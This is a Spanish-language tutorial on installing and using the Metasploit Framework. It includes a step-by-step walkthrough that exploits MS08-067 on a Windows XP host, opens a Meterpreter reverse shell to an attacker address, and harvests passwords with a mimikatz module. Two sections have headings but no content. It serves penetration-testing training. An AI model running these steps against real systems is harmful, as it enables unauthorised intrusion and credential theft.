Manual Completo: Uso de Metasploit Framework

Metasploit Framework es una herramienta de código abierto ampliamente utilizada para realizar pruebas de penetración y actividades relacionadas con la seguridad ofensiva. Este manual detalla desde la instalación hasta el uso básico y avanzado de la herramienta.


Sección 1: Instalación de Metasploit Framework en Debian 12

1.1 Actualización del sistema

Ejecuta los siguientes comandos para actualizar los paquetes del sistema:

sudo apt update && sudo apt upgrade -y

1.2 Instalación de dependencias necesarias

Metasploit requiere varias bibliotecas y herramientas:

sudo apt install -y curl gpg gcc g++ make zlib1g-dev libpq-dev libpcap-dev postgresql postgresql-contrib git ruby-full

1.3 Configuración de PostgreSQL

  1. Inicia el servicio de PostgreSQL: sudo systemctl start postgresql sudo systemctl enable postgresql
  2. Configura un usuario y una base de datos: sudo -u postgres createuser msf -P sudo -u postgres createdb msf_database -O msf

1.4 Descarga e instalación de Metasploit Framework

  1. Clona el repositorio oficial: git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework
  2. Instala Bundler y las dependencias: gem install bundler bundle install

1.5 Configuración de la base de datos

  1. Copia la configuración de base de datos predeterminada: cp config/database.yml.example config/database.yml
  2. Edita el archivo config/database.yml para agregar las credenciales de PostgreSQL:production: adapter: postgresql database: msf_database username: msf password: [tu_contraseña] host: 127.0.0.1 port: 5432

1.6 Ejecución de Metasploit Framework

Inicia Metasploit Framework: ./msfconsole

Verifica la conexión a la base de datos: db_status

Deberías ver: [*] Connected to msf_database


Sección 2: Conceptos Básicos de Metasploit

2.1 Componentes Principales

2.2 Navegación Básica

2.2.1 Comandos esenciales

  1. Buscar módulos: search [palabra_clave]Ejemplo: search smb
  2. Seleccionar un módulo: use [ruta_del_módulo]Ejemplo: use exploit/windows/smb/ms08_067_netapi
  3. Ver opciones del módulo: show options
  4. Configurar opciones: set [opción] [valor]Ejemplo: set RHOSTS 192.168.1.10
  5. Ejecutar el módulo: run

2.2.2 Gestionar bases de datos

  1. Agregar hosts: db_nmap 192.168.1.0/24
  2. Mostrar hosts almacenados: hosts

Sección 3: Ejemplo Práctico – Exploitar una Vulnerabilidad

3.1 Escaneo de Red con Nmap

Usa Nmap para identificar dispositivos en la red: nmap -sS -sV 192.168.1.0/24

3.2 Selección de un Exploit

Supongamos que el escaneo revela un sistema Windows XP vulnerable al SMB: use exploit/windows/smb/ms08_067_netapi

3.3 Configuración del Exploit

  1. Establece el objetivo: set RHOSTS 192.168.1.10
  2. Configura el payload: set PAYLOAD windows/meterpreter/reverse_tcp
  3. Define el host y puerto del atacante: set LHOST 192.168.1.100 set LPORT 4444

3.4 Ejecución del Exploit

Ejecuta el exploit: run

3.5 Interacción con la Sesión Meterpreter

Una vez que obtengas acceso:

  1. Verifica información del sistema: sysinfo
  2. Obtén una shell del sistema: shell

Sección 4: Módulos Auxiliares y Post-Explotación

4.1 Escaneo de Puertos con un Módulo Auxiliar

  1. Usa el módulo de escaneo de puertos: use auxiliary/scanner/portscan/tcp
  2. Configura las opciones: set RHOSTS 192.168.1.0/24 set THREADS 10
  3. Ejecuta el módulo: run

4.2 Recolectar Contraseñas

  1. Usa un módulo de post-explotación: use post/windows/gather/credentials/mimikatz
  2. Configura la sesión: set SESSION 1
  3. Ejecuta el módulo: run

Sección 5: Consejos de Seguridad y Buenas Prácticas


Conclusión

Metasploit Framework es una herramienta poderosa que permite realizar pruebas de penetración y explorar vulnerabilidades de manera profesional. Con una configuración adecuada y un uso ético, puedes identificar y mitigar riesgos en sistemas de manera efectiva. ¡Practica responsablemente y sigue aprendiendo!